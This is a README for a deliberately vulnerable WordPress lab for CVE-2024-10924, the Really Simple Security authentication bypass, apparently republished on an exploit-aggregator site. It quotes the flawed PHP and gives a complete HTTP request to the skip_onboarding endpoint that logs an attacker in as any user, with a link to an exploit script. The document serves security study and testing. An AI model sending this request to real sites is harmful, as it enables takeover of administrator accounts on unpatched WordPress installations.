## https://sploitus.com/exploit?id=725FCD01-CB3A-511F-BD5D-EE9E1019BF58
# wordpress-really-simple-security-authn-bypass-vulnerable-application
This is a vulnerable application to test the exploit for the **Really Simple Security** < 9.1.2 authentication bypass (CVE-2024-10924).
## WARNING!
**This application contains serious security vulnerabilities. Run it at your own risk! It is recommended to use a backed-up and sheltered environment (such as a VM with a recent snapshot and host-only networking). Do not upload this application to any Internet-facing server, as it will be compromised.**
***DISCLAIMER*: I do not take responsibility for the way in which anyone uses this application. The only purpose of this application is to be a test scenario for the Really Simple Security < 9.1.2 authentication bypass (CVE-2024-10924) exploit and it should not be used maliciously. If your server is compromised via an installation of this application it is not my responsibility, it is the responsibility of the person(s) who uploaded and installed it.**
## Vulnerability info
* **CVE-ID**: CVE-2024-10924
* **Link**: [https://vulners.com/cve/CVE-2024-10924](https://vulners.com/cve/CVE-2024-10924)
* **Description**: Improper handling of the user-check error in the plugin's two-factor REST API actions (the `check_login_and_get_user()` function) makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, when the "*Two-Factor Authentication*" setting is enabled (disabled by default). Affected versions: 9.0.0 to 9.1.1.1 (Free, Pro and Pro Multisite).
* **Fix:** [https://plugins.trac.wordpress.org/changeset/3188431/really-simple-ssl](https://plugins.trac.wordpress.org/changeset/3188431/really-simple-ssl)
* **Wordfence bulletin:** [https://www.wordfence.com/threat-intel/vulnerabilities/detail/really-simple-security-free-pro-and-pro-multisite-900-9111-authentication-bypass](https://www.wordfence.com/threat-intel/vulnerabilities/detail/really-simple-security-free-pro-and-pro-multisite-900-9111-authentication-bypass)
## Usage
Here are the steps to **set up** the environment:
1. Launch `./up.sh` to start composition.
2. Complete the installation of WordPress here: [http://localhost:1337/wp-admin/install.php](http://localhost:1337/wp-admin/install.php).
3. Log in to WordPress.
4. Go to "*Plugins*": [http://localhost:1337/wp-admin/plugins.php](http://localhost:1337/wp-admin/plugins.php).
5. Click on "*Activate*" under the "*Really Simple Security*" plugin. **DO NOT UPDATE IT**, since we need the vulnerable version.
6. Click on "*Cancel*" on the popup referring to SSL activation.
7. Go to "*Settings*" > "*Login Protection*" > "*Two-Factor Authentication*" and, in the "*Two-Factor Authentication*" section, enable "*Enable Two-Factor Authentication*".
8. Click the "*Save*" button.
The container will be called `vuln-wp-really-simple-security`.
To **tear down** the environment use `./down.sh`, or `./down_and_delete.sh` to also remove the images and the database volume.
## Root cause
Looking at the [fix](https://github.com/Really-Simple-Plugins/really-simple-ssl/commit/33b6bae321f437f5d822e7d7e03103915530c86c#diff-826cac126398ce784274642e7be5f5214f94d72e6ae8ee07303b5d485587fdce), it's possible to understand that in the vulnerable version the `check_login_and_get_user()` function, on an invalid login nonce, merely *returned* a 403 `WP_REST_Response` error object as its result, without aborting the whole operation.
```php
private function check_login_and_get_user( int $user_id, string $login_nonce ) {
    if ( ! Rsssl_Two_Fa_Authentication::verify_login_nonce( $user_id, $login_nonce ) ) {
        // Vulnerable: the failure is returned as a plain value that the caller
        // is free to ignore, instead of stopping the request.
        return new WP_REST_Response( array( 'error' => 'Invalid login nonce' ), 403 );
    }
    /**
     * Get the user by the user ID.
     *
     * @var WP_User $user
     */
    $user = get_user_by( 'id', $user_id );
    return $user;
}
```
The caller, however, never checked the return value of `check_login_and_get_user()` ([line 277](https://github.com/Really-Simple-Plugins/really-simple-ssl/blob/eb1ac89afa36661bfbb1992edc930fe809a9c88d/security/wordpress/two-fa/class-rsssl-two-factor-on-board-api.php#L277)): it simply went on to call `authenticate_and_redirect()` ([line 278](https://github.com/Really-Simple-Plugins/really-simple-ssl/blob/eb1ac89afa36661bfbb1992edc930fe809a9c88d/security/wordpress/two-fa/class-rsssl-two-factor-on-board-api.php#L278)) with the very same user ID received from the request, so an invalid nonce had no effect on the outcome.
```php
public function skip_onboarding( WP_REST_Request $request ): WP_REST_Response {
    $parameters = new Rsssl_Request_Parameters( $request );
    // As a double we check the user_id with the login nonce.
    // Vulnerable: $user may be the 403 WP_REST_Response, but it is never inspected...
    $user = $this->check_login_and_get_user( (int)$parameters->user_id, $parameters->login_nonce );
    // ...and the attacker-supplied user_id is logged in regardless.
    return $this->authenticate_and_redirect( $parameters->user_id, $parameters->redirect_to );
}
```
## Exploit
To exploit the vulnerability, a request like the following is sufficient.
```http
POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: localhost:1337
Content-Type: application/json
Content-Length: 88
Connection: keep-alive

{
    "user_id": 1,
    "login_nonce": "133333337",
    "redirect_to": "/wp-admin/"
}
```
Then set the session cookies returned in the response (the `Set-Cookie` headers) in the browser.
The `user_id` must be the ID of the target user; the `login_nonce` can be anything, since a wrong value doesn't block the process (adjust `Content-Length` if you change the body).
An exploit script in Python can be found [here](https://github.com/m3ssap0/wordpress-really-simple-security-authn-bypass-exploit).
## Authors
* **Antonio Francesco Sardella** - *implementation* - [m3ssap0](https://github.com/m3ssap0)
## License
This project is licensed under the Unlicense - see the **LICENSE** file for details.
## Acknowledgments
* [**István Márton**](https://www.wordfence.com/threat-intel/vulnerabilities/detail/really-simple-security-free-pro-and-pro-multisite-900-9111-authentication-bypass), the security researcher who discovered the vulnerability.